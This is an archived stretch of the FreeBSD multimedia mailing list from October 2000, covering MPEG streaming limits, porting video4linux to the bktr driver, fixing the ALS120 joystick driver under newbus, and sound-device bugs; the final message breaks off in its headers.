From owner-freebsd-multimedia Sun Oct 29 1:58:33 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from gilberto.physik.rwth-aachen.de (gilberto.physik.rwth-aachen.de [137.226.30.2]) by hub.freebsd.org (Postfix) with ESMTP id 8FDE737B479 for ; Sun, 29 Oct 2000 01:58:31 -0800 (PST) Received: (from kuku@localhost) by gilberto.physik.rwth-aachen.de (8.9.3/8.9.3) id KAA09439 for multimedia@freebsd.org; Sun, 29 Oct 2000 10:58:33 +0100 (CET) (envelope-from kuku) Date: Sun, 29 Oct 2000 10:58:33 +0100 (CET) From: Christoph Kukulies Message-Id: <200010290958.KAA09439@gilberto.physik.rwth-aachen.de> To: multimedia@freebsd.org Subject: reading an mp3 stream (or .wav) Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'd like to gather some opinions on the following: given you have a .wav or .mp3 file. What tools are there to read it and analyze it. I have no idea about the format and how time relationship and synchronization is achieved. The idea behind is: I want to analyze the music data and filter out digitally e.g. bass lines, chords and changes on a per bar basis, run back and forth in a scope like manner. I believe there are some sound editors in the windows world that do that, like soundforge, Creative Wavestudio etc. But I don't know of little that does a direct conversion of certain instruments melody lines into notes. Any comments, suggestions? -- Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Sun Oct 29 2:24:59 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from f1node03.rhrz.uni-bonn.de (node03.rhrz.uni-bonn.de [131.220.18.133]) by hub.freebsd.org (Postfix) with ESMTP id E555037B479 for ; Sun, 29 Oct 2000 02:24:56 -0800 (PST) Received: from moritz.alleswirdgelber (ascend-tk-p148.dialin.uni-bonn.de [131.220.244.148]) by f1node03.rhrz.uni-bonn.de (8.9.3/8.9.3) with ESMTP id LAA173546 for ; Sun, 29 Oct 2000 11:21:43 +0100 Received: from localhost (uzs106@localhost [127.0.0.1]) by moritz.alleswirdgelber (8.9.3/8.9.3) with ESMTP id LAA00548 for ; Sun, 29 Oct 2000 11:23:18 +0100 (CET) (envelope-from uzs106@ibm.rhrz.uni-bonn.de) Date: Sun, 29 Oct 2000 11:23:17 +0100 (CET) From: Heiko Recktenwald X-Sender: uzs106@moritz.alleswirdgelber To: multimedia@FreeBSD.ORG Subject: video4linux.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I think video4linux is an API. Shouldnt it be possible to have this somewhere in the kernel ? Or somewhere else. There are many Linux programs, that use it. mp1e is one of them. Broadcast200 seems to be another. Maqybe to have video4linux on FreeBSD systems would be the most easy strategy. Best, H. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Sun Oct 29 6:48:42 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from lurza.secnetix.de (lurza.secnetix.de [212.66.1.130]) by hub.freebsd.org (Postfix) with ESMTP id 6D1A937B479 for ; Sun, 29 Oct 2000 06:48:39 -0800 (PST) Received: from monos.secnetix.net (monos.secnetix.net [172.20.20.5]) by lurza.secnetix.de (8.9.3/8.9.3) with ESMTP id PAA43947 for ; Sun, 29 Oct 2000 15:48:37 +0100 (CET) (envelope-from olli@secnetix.de) Received: (from olli@localhost) by monos.secnetix.net (8.9.3/8.9.3) id PAA17996; Sun, 29 Oct 2000 15:48:37 +0100 (CET) (envelope-from olli@secnetix.de) Date: Sun, 29 Oct 2000 15:48:37 +0100 (CET) Message-Id: <200010291448.PAA17996@monos.secnetix.net> From: Oliver Fromme To: freebsd-multimedia@FreeBSD.ORG Subject: Re: Streaming MPEG.. In-Reply-To: X-Newsgroups: list.freebsd-multimedia User-Agent: tin/1.5.4-20000523 ("1959") (UNIX) (FreeBSD/4.1-RELEASE (i386)) MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Heiko Recktenwald wrote: > On Tue, 24 Oct 2000, Oliver Fromme wrote: > > Note that "I-frame crippled" MPEG has pretty poor > > compression/quality, compared to "real" MPEG streams > > (with I, B and P frames). > > This is the old Xing streaming, I think. Correct. > man vic, from 1995, says, that MPEG isnt supported yet, > contrary to former plans, and I saw a big SGI Media server, > that can stream 100 MPEG streams...but this is broadband. Well, MPEG streams are (unfortunately!) not very well-suited for transmission via lossy media, like mbone (vic etc.). This is because of the inter-dependencies embedded in the MPEG streams. For example, when you lose some data while transmitting an MPEG video (or system) stream, _all_ the following data is useless till the next I-frame. Similarly for audio: when you lose data within a layer-3 stream, it not only destroys the current frame, but also the two next frames (worst case). Of course, you could restrict (or rather: cripple) your MPEG streams to I-frames only and layer-2 audio, but then you'll lose a good deal of compression/quality capability. One of the _really_ big strengths of MPEG is the ability to perform motion interpolation and prediction, which require B- and P- frames. Therefore I'm not surprised that MPEG is not on top of the to-do list for the vic developers. MPEG is better suited for reliable media such as TCP connections. There are other formats which are better suited for streaming via multicast (mbone). Regards Oliver -- Oliver Fromme, secnetix GmbH & Co KG, Oettingenstr. 2, 80538 München Any opinions expressed in this message may be personal to the author and may not necessarily reflect the opinions of secnetix in any way. "All that we see or seem is just a dream within a dream" (E. A. Poe) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Sun Oct 29 13:11:39 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from f1node03.rhrz.uni-bonn.de (node03.rhrz.uni-bonn.de [131.220.18.133]) by hub.freebsd.org (Postfix) with ESMTP id 356A837B479 for ; Sun, 29 Oct 2000 13:11:37 -0800 (PST) Received: from moritz.alleswirdgelber (ascend-tk-p101.dialin.uni-bonn.de [131.220.244.101]) by f1node03.rhrz.uni-bonn.de (8.9.3/8.9.3) with ESMTP id WAA60268; Sun, 29 Oct 2000 22:08:22 +0100 Received: from localhost (uzs106@localhost [127.0.0.1]) by moritz.alleswirdgelber (8.9.3/8.9.3) with ESMTP id UAA01406; Sun, 29 Oct 2000 20:41:40 +0100 (CET) (envelope-from uzs106@ibm.rhrz.uni-bonn.de) Date: Sun, 29 Oct 2000 20:41:40 +0100 (CET) From: Heiko Recktenwald X-Sender: uzs106@moritz.alleswirdgelber To: Oliver Fromme Cc: freebsd-multimedia@FreeBSD.ORG Subject: Re: Streaming MPEG.. In-Reply-To: <200010291448.PAA17996@monos.secnetix.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, On Sun, 29 Oct 2000, Oliver Fromme wrote: > Heiko Recktenwald wrote: > > On Tue, 24 Oct 2000, Oliver Fromme wrote: > > > Note that "I-frame crippled" MPEG has pretty poor > > > compression/quality, compared to "real" MPEG streams > > > (with I, B and P frames). > > > > This is the old Xing streaming, I think. > > Correct. I think Frank Gadegast who wrote many MPEG programs some years ago, and he had www.mpeg1.de or something like that, there is still a mirror in sweden working, had a Xing demo on his site, a system for some kind of InternetTV, but I dont remember the details. Old Linux and it didnt work here. Anyway, if we had something like mp1e and icecast, plugging the Videorecorder or the Kamera into the box et voila...that would be fun. But I have never made experiments with MPEG audio or video outside the DFN.. H. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Sun Oct 29 16:12:25 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from cain.gsoft.com.au (genesi.lnk.telstra.net [139.130.136.161]) by hub.freebsd.org (Postfix) with ESMTP id C878437B65F for ; Sun, 29 Oct 2000 16:12:21 -0800 (PST) Received: from cain.gsoft.com.au (doconnor@cain [203.38.152.97]) by cain.gsoft.com.au (8.8.8/8.8.8) with ESMTP id KAA07627; Mon, 30 Oct 2000 10:42:05 +1030 (CST) (envelope-from doconnor@gsoft.com.au) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Mon, 30 Oct 2000 10:42:05 +0930 (CST) From: "Daniel O'Connor" To: Mike Holling Subject: RE: joystick on als120 Cc: freebsd-multimedia@freebsd.org Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 28-Oct-00 Mike Holling wrote: > Sound works fine, however the joystick port doesn't seem to work at all. > joy.c makes reference to the ALS120, is there something else I need to do > to activate the port? Last time I checked the joystick driver it attached but returned bogus results (as in always returns the same number, and no buttons down). I think it was broken around newbus and not fixed since (not exactly a core driver I guess ;) --- Daniel O'Connor software and network engineer for Genesis Software - http://www.gsoft.com.au "The nice thing about standards is that there are so many of them to choose from." -- Andrew Tanenbaum To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Sun Oct 29 16:17:33 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from hammerhead.fks.lan (tc5-2-10.cyberport.net [208.168.122.217]) by hub.freebsd.org (Postfix) with ESMTP id E522E37B4D7 for ; Sun, 29 Oct 2000 16:17:14 -0800 (PST) Received: from localhost (myke@localhost) by hammerhead.fks.lan (8.9.3/8.9.3) with ESMTP id RAA24733; Sun, 29 Oct 2000 17:14:51 -0700 (MST) (envelope-from myke@fks.bt) X-Authentication-Warning: hammerhead.fks.lan: myke owned process doing -bs Date: Sun, 29 Oct 2000 17:14:48 -0700 (MST) From: Mike Holling X-Sender: myke@hammerhead.fks.lan To: "Daniel O'Connor" Cc: freebsd-multimedia@freebsd.org Subject: RE: joystick on als120 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Last time I checked the joystick driver it attached but returned bogus > results (as in always returns the same number, and no buttons down). Yup that's what happens on my system. > I think it was broken around newbus and not fixed since (not exactly a core > driver I guess ;) Well, the joystick driver should be pretty simple to fix. Are the ALS120 data sheets publically available? Has anyone else been working on this recently, or just I just start hacking at it? - Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Sun Oct 29 16:58: 4 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from cain.gsoft.com.au (genesi.lnk.telstra.net [139.130.136.161]) by hub.freebsd.org (Postfix) with ESMTP id 70D7537B4C5 for ; Sun, 29 Oct 2000 16:58:00 -0800 (PST) Received: from cain.gsoft.com.au (doconnor@cain [203.38.152.97]) by cain.gsoft.com.au (8.8.8/8.8.8) with ESMTP id LAA08254; Mon, 30 Oct 2000 11:27:50 +1030 (CST) (envelope-from doconnor@gsoft.com.au) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Mon, 30 Oct 2000 11:27:50 +0930 (CST) From: "Daniel O'Connor" To: Mike Holling Subject: RE: joystick on als120 Cc: freebsd-multimedia@freebsd.org Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 29-Oct-00 Mike Holling wrote: > > I think it was broken around newbus and not fixed since (not exactly a core > > driver I guess ;) > Well, the joystick driver should be pretty simple to fix. Are the ALS120 > data sheets publically available? Has anyone else been working on this > recently, or just I just start hacking at it? You don't need the data sheets for a particular chip, just how the joystick port works. There is a bitmask for the buttons, and to read the potentiometers you write to the port and keep reading until the POTX/Y bits go low and the elapsed time tells you what the resitance is (and hence the position of the joystick). Some joysticks (eg MS Sidewinder) have a digital mode which is fairly evil, you put the joystick in this mode by writing to the port several times with several carefully crafted delays, then you read the joystick data by writing and polling the joystick button lines (uses 2, 1 clock and 1 data) to get a 64 bit value back which contains analogue positioning info and button/hat states. It is discussed in US patent #5628686 (which MS hold funnily enough..) Here are some interesting URLs you might find useful -> http://atrey.karlin.mff.cuni.cz/~vojtech/joystick/ http://www.hut.fi/Misc/Electronics/docs/joystick/ http://www.delphion.com/details?pn=US05628686__ --- Daniel O'Connor software and network engineer for Genesis Software - http://www.gsoft.com.au "The nice thing about standards is that there are so many of them to choose from." -- Andrew Tanenbaum To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Sun Oct 29 23:47: 9 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from kiew.egd.igd.fhg.de (kiew.egd.igd.fhg.de [192.102.170.32]) by hub.freebsd.org (Postfix) with ESMTP id 6A84137B479 for ; Sun, 29 Oct 2000 23:47:06 -0800 (PST) Received: from penguin (penguin.egd.igd.fhg.de [192.102.170.145]) by kiew.egd.igd.fhg.de (Netscape Messaging Server 3.6) with ESMTP id AAA18EF; Mon, 30 Oct 2000 08:46:59 +0100 Date: Mon, 30 Oct 2000 08:48:17 +0100 (CET) From: "Thomas Runge" X-Sender: runge@penguin.egd.igd.fhg.de To: Heiko Recktenwald Cc: multimedia@FreeBSD.ORG Subject: Re: video4linux.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 29 Oct 2000, Heiko Recktenwald wrote: > Hi, I think video4linux is an API. Shouldnt it be possible to have this > somewhere in the kernel ? Or somewhere else. Yes, technically it is possible to put V4L on top of our bktr driver. It's just quiet a lot of work. And finally we have a volunteer! Thanks, Heiko! >:-) -- Tom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Mon Oct 30 0:50:49 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from mailrouter1.strath.ac.uk (orkney.cc.strath.ac.uk [130.159.248.40]) by hub.freebsd.org (Postfix) with ESMTP id A7F6937B4E5 for ; Mon, 30 Oct 2000 00:50:44 -0800 (PST) Received: from m1-mp2-cvx1b.ren.ntl.com ([62.252.129.65] helo=cs.strath.ac.uk) by mailrouter1.strath.ac.uk with esmtp (Exim 3.12 #2) id 13qAe9-00023N-00; Mon, 30 Oct 2000 08:50:25 +0000 Message-ID: <39FD3620.89774781@cs.strath.ac.uk> Date: Mon, 30 Oct 2000 08:49:36 +0000 From: Roger Hardiman Organization: Strathclyde University X-Mailer: Mozilla 4.51 [en] (X11; I; FreeBSD 4.1.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Thomas Runge Cc: Heiko Recktenwald , multimedia@FreeBSD.ORG Subject: Re: video4linux.. References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thomas, Heiko, > video4linux is an API I wonder if it would be easier to port Justin's latest V4L/V4L2 bt848/bt848 driver from linux to FreeBSD rather than reimplement the entire API in the bktr driver. More information on the linux driver can be found at http://bttv-v4l2.sourceforge.net/ Roger To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Mon Oct 30 3:20:54 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from mailrouter1.strath.ac.uk (orkney.cc.strath.ac.uk [130.159.248.40]) by hub.freebsd.org (Postfix) with ESMTP id 7E51B37B479 for ; Mon, 30 Oct 2000 03:20:52 -0800 (PST) Received: from m729-mp1-cvx3c.ren.ntl.com ([213.104.130.217] helo=cs.strath.ac.uk) by mailrouter1.strath.ac.uk with esmtp (Exim 3.12 #2) id 13qCzR-0004ei-00 for multimedia@freebsd.org; Mon, 30 Oct 2000 11:20:34 +0000 Message-ID: <39FD5952.35C0CBF7@cs.strath.ac.uk> Date: Mon, 30 Oct 2000 11:19:46 +0000 From: Roger Hardiman Organization: Strathclyde University X-Mailer: Mozilla 4.51 [en] (X11; I; FreeBSD 4.1.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: multimedia@freebsd.org Subject: New BKTR driver. Please test Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, I've updated the bktr driver to handle some new models of the Hauppauge cards with MSP34xx chips. I want to make sure I've not broken support for older cards so can those of you with Hauppauge cards and MSP34xx chips (3410, 3415, 3430 etc) please download the new driver and test it. Download the driver from ftp://telepresence.dmem.strath.ac.uk/pub/bt848/snapshot/current Note: You'll need to copy the new ioctl_bt848.h over your old one in /usr/src/sys/i386/include Thanks Roger To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Mon Oct 30 3:24: 7 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from f1node03.rhrz.uni-bonn.de (node03.rhrz.uni-bonn.de [131.220.18.133]) by hub.freebsd.org (Postfix) with ESMTP id 2788037B479 for ; Mon, 30 Oct 2000 03:24:05 -0800 (PST) Received: from moritz.alleswirdgelber (ascend-tk-p15.dialin.uni-bonn.de [131.220.244.15]) by f1node03.rhrz.uni-bonn.de (8.9.3/8.9.3) with ESMTP id MAA102584; Mon, 30 Oct 2000 12:20:47 +0100 Received: from localhost (uzs106@localhost [127.0.0.1]) by moritz.alleswirdgelber (8.9.3/8.9.3) with ESMTP id LAA00597; Mon, 30 Oct 2000 11:52:28 +0100 (CET) (envelope-from uzs106@ibm.rhrz.uni-bonn.de) Date: Mon, 30 Oct 2000 11:52:28 +0100 (CET) From: Heiko Recktenwald X-Sender: uzs106@moritz.alleswirdgelber To: Thomas Runge Cc: multimedia@FreeBSD.ORG Subject: Re: video4linux.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > And finally we have a volunteer! Thanks, Heiko! >:-) Dear Thomas, you know exactly, that *I* cannot do it ;-) I am just browsing the web and all I see is "video4linux", so it seems to be an allready established standard in this other world. Best, Heiko To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Mon Oct 30 7:32:17 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from smtp1.alehop.com (unknown [62.81.160.67]) by hub.freebsd.org (Postfix) with ESMTP id 22E2437B4C5 for ; Mon, 30 Oct 2000 07:32:14 -0800 (PST) Received: from arrakis.es ([62.82.196.198]) by smtp1.alehop.com (Netscape Messaging Server 4.15) with ESMTP id G391TL02.MHG for ; Mon, 30 Oct 2000 16:32:09 +0100 Message-ID: <39FD9452.EE47B6A0@arrakis.es> Date: Mon, 30 Oct 2000 16:31:30 +0100 From: Oldno7 X-Mailer: Mozilla 4.6 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-multimedia@freebsd.org Subject: Re: video4linux.. References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One year ago I founded the same thing.. and I promised to my self to do that when I improved my driver development knowledges enough to do it. First I though it can be 6 o 8 months.. now I don't believe it can be possible in less than one year more.... but I'll do.. of course I'll do it :))) (did you think I gived it up, reger? :))) ) Heiko Recktenwald wrote: > > And finally we have a volunteer! Thanks, Heiko! >:-) > > Dear Thomas, you know exactly, that *I* cannot do it ;-) > > I am just browsing the web and all I see is "video4linux", so it seems to > be an allready established standard in this other world. > > Best, > > Heiko > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-multimedia" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Mon Oct 30 8:17:39 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from serenity.mcc.ac.uk (serenity.mcc.ac.uk [130.88.200.93]) by hub.freebsd.org (Postfix) with ESMTP id 9EFC237B479 for ; Mon, 30 Oct 2000 08:17:37 -0800 (PST) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97]) by serenity.mcc.ac.uk with esmtp (Exim 2.05 #4) id 13qHcu-00097u-00 for multimedia@freebsd.org; Mon, 30 Oct 2000 16:17:36 +0000 Received: (from jcm@localhost) by dogma.freebsd-uk.eu.org (8.9.3/8.9.3) id QAA79457 for multimedia@freebsd.org; Mon, 30 Oct 2000 16:17:36 GMT (envelope-from jcm) Date: Mon, 30 Oct 2000 16:17:36 +0000 From: j mckitrick To: multimedia@freebsd.org Subject: dsp problems Message-ID: <20001030161736.A79396@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has any progress been made on the /dev/dsp bug that complains about invalid format when playing .wav files? If not, I plan to file a PR soon. The posted patch did not solve the problem for me. I can send uname, sndstat, and truss info if necessary. I am running 4.1.1 on Toshiba laptop with the Yamaha OPL-SAX3 YMF719 sound card. jcm -- "That depends on what the meaning of the word 'is' is." -President Bill Clinton "I don't know what you mean by the word 'ask.'" -CEO Bill Gates To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Mon Oct 30 13:29:36 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from sack.ees.com (sack.ees.com [199.2.205.244]) by hub.freebsd.org (Postfix) with ESMTP id 5781637B4C5 for ; Mon, 30 Oct 2000 13:29:28 -0800 (PST) Received: from localhost (myke@localhost) by sack.ees.com (8.8.7/8.8.7) with SMTP id NAA02958; Mon, 30 Oct 2000 13:26:22 -0800 (PST) (envelope-from myke@ees.com) Date: Mon, 30 Oct 2000 13:26:18 -0800 (PST) From: Mike Holling To: "Daniel O'Connor" Cc: freebsd-multimedia@freebsd.org Subject: RE: joystick on als120 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok, I've got the old joystick driver code working again with newbus, but I don't quite understand the probing process. I'm using joy as an LKM, and whenever I load the module the "probe" method seems to be called three times. Below is some output from the driver, now heavily littered with debugging info. The "probing joystick" message is printed each time joy_probe is invoked. It works the second time, I don't understand what device I got the first time (which can't be assigned an IO port resource at 0x201). I could also use some more clues on how to setup the PNP table; I suspect the multiple probes may be due to PNP but I'm not sure. The number for ALS120 in the old driver didn't match anything I saw in pnpinfo, and I wasn't able to tell what (if anything) in pnpinfo corresponded to the game port. The ISA driver tutorial is excellent, but only covers statically compiled drivers, do I need to do something slightly different for an lkm? Oct 30 14:08:01 av /kernel: DEBUG: Probing joystick Oct 30 14:08:01 av /kernel: DEBUG: got ENXIO from pnp_probe, ignoring for now Oct 30 14:08:01 av /kernel: DEBUG: got '6' from pnp probe Oct 30 14:08:01 av /kernel: DEBUG: attempting to allocate resource... Oct 30 14:08:01 av /kernel: DEBUG: problem with bus_alloc_resource, returning Oct 30 14:08:01 av /kernel: DEBUG: Probing joystick Oct 30 14:08:01 av /kernel: DEBUG: got ENXIO from pnp_probe, ignoring for now Oct 30 14:08:01 av /kernel: DEBUG: got '6' from pnp probe Oct 30 14:08:01 av /kernel: DEBUG: attempting to allocate resource... Oct 30 14:08:01 av /kernel: DEBUG: Joystick probe OK, returning 0 Oct 30 14:08:01 av /kernel: joy0: at port 0x201 on isa0 Oct 30 14:08:01 av /kernel: DEBUG: attaching joystick Oct 30 14:08:01 av /kernel: DEBUG: device state is 'alive' Oct 30 14:08:01 av /kernel: DEBUG: dev->parent is '-1064669696' Oct 30 14:08:01 av /kernel: DEBUG: joystick attached successfully, returning 0 Oct 30 14:08:01 av /kernel: DEBUG: Probing joystick Oct 30 14:08:01 av /kernel: DEBUG: got ENXIO from pnp_probe, ignoring for now Oct 30 14:08:01 av /kernel: DEBUG: got '6' from pnp probe Oct 30 14:08:01 av /kernel: DEBUG: got unit number of 1, expecting 0, returning The driver seems to work OK otherwise, and the test program in the joy man page returns reasonable looking values. Actually getting any application programs to use the joystick device correctly is another matter. Has anyone used the "Joystick" subsection for "XInput"? The man pages say it should be supported but XFree complains that "Joystick" is not a valid subsection entry. xmame does work with the joystick in i386 driver mode, but only after adding some defines to a sub-Makefile. - Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Mon Oct 30 15:38:28 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from f1node03.rhrz.uni-bonn.de (node03.rhrz.uni-bonn.de [131.220.18.133]) by hub.freebsd.org (Postfix) with ESMTP id E3F2B37B479 for ; Mon, 30 Oct 2000 15:38:23 -0800 (PST) Received: from moritz.alleswirdgelber (ascend-tk-p116.dialin.uni-bonn.de [131.220.244.116]) by f1node03.rhrz.uni-bonn.de (8.9.3/8.9.3) with ESMTP id AAA520798; Tue, 31 Oct 2000 00:35:08 +0100 Received: from localhost (uzs106@localhost [127.0.0.1]) by moritz.alleswirdgelber (8.9.3/8.9.3) with ESMTP id XAA08047; Mon, 30 Oct 2000 23:05:25 +0100 (CET) (envelope-from uzs106@ibm.rhrz.uni-bonn.de) Date: Mon, 30 Oct 2000 23:05:24 +0100 (CET) From: Heiko Recktenwald X-Sender: uzs106@moritz.alleswirdgelber To: Oliver Fromme Cc: freebsd-multimedia@FreeBSD.ORG Subject: MPEG, ne pas sympa ? In-Reply-To: <200010291448.PAA17996@monos.secnetix.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Oliver Fromme: > Well, MPEG streams are (unfortunately!) not verywell-suited > for transmission via lossy media, like mbone (vic etc.). Internet in general might be the same. > This is because of the inter-dependencies embedded in the > MPEG streams. For example, when you lose some data while > transmitting an MPEG video (or system) stream, _all_ the > following data is useless till the next I-frame. Similarly > for audio: when you lose data within a layer-3 stream, it > not only destroys the current frame, but also the two next > frames (worst case). That would be maximum loss of around half a second for MPEG Video. Isnt this acceptable ? Flickering screens.... Is this better with Sorensen ? Darling of the QT community.. Or realaudio ? www.mp3.com was rather successfull with streaming mp3s, I think. Maybe more as a social phenomenon. But I like the simplicity of mpeg_encode and mtvp and there are a lot of other MPEG Video players that can stream. Maybe it is like VHS and BETA, BETA is better, but VHS is what the people want, hopefully.. H. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Mon Oct 30 16:23:43 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from cain.gsoft.com.au (genesi.lnk.telstra.net [139.130.136.161]) by hub.freebsd.org (Postfix) with ESMTP id B105537B4CF for ; Mon, 30 Oct 2000 16:23:38 -0800 (PST) Received: from cain.gsoft.com.au (doconnor@cain [203.38.152.97]) by cain.gsoft.com.au (8.8.8/8.8.8) with ESMTP id KAA21897; Tue, 31 Oct 2000 10:53:22 +1030 (CST) (envelope-from doconnor@gsoft.com.au) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Tue, 31 Oct 2000 10:53:22 +0930 (CST) From: "Daniel O'Connor" To: Mike Holling Subject: RE: joystick on als120 Cc: freebsd-multimedia@freebsd.org Sender: owner-freebsd-multimedia@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30-Oct-00 Mike Holling wrote: > don't quite understand the probing process. I'm using joy as an LKM, and > whenever I load the module the "probe" method seems to be called three > times. Below is some output from the driver, now heavily littered with That isn't suprising.. AFAIK newbus tries the newly loaded driver on the 'leftovers' (ie devices which nothing is yet attached to) > The number for ALS120 in the old driver didn't match anything I saw in > pnpinfo, and I wasn't able to tell what (if anything) in pnpinfo > corresponded to the game port. The ISA driver tutorial is excellent, but Hmm.. I would show you an example but I don't have any PnP devices on a machine I have access to at the moment :) > only covers statically compiled drivers, do I need to do something > slightly different for an lkm? No, AFAIK when you have any driver it can be a KLD provided it is compiled the correct way. (Definatly not 100% sure tho :) - However I do know the joy driver has the requisite magic in it already. > The driver seems to work OK otherwise, and the test program in the joy man > page returns reasonable looking values. Actually getting any application > programs to use the joystick device correctly is another matter. Has > anyone used the "Joystick" subsection for "XInput"? The man pages say it > should be supported but XFree complains that "Joystick" is not a valid Have you tried adding a 'Load xf86Jstk.so' ? I haven't tried using the joystick under X before though. > subsection entry. xmame does work with the joystick in i386 driver mode, > but only after adding some defines to a sub-Makefile. Send a patch to the port maintainer 8-) --- Daniel O'Connor software and network engineer for Genesis Software - http://www.gsoft.com.au "The nice thing about standards is that there are so many of them to choose from." -- Andrew Tanenbaum To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-multimedia" in the body of the message From owner-freebsd-multimedia Tue Oct 31 4:46:58 2000 Delivered-To: freebsd-multimedia@freebsd.org Received: from mout0.freenet.de (mout0.freenet.de [194.97.50.131]) by hub.freebsd.org (Postfix) with ESMTP id 9D56737B479 for ; Tue, 31 Oct 2000 04:46:55 -0800 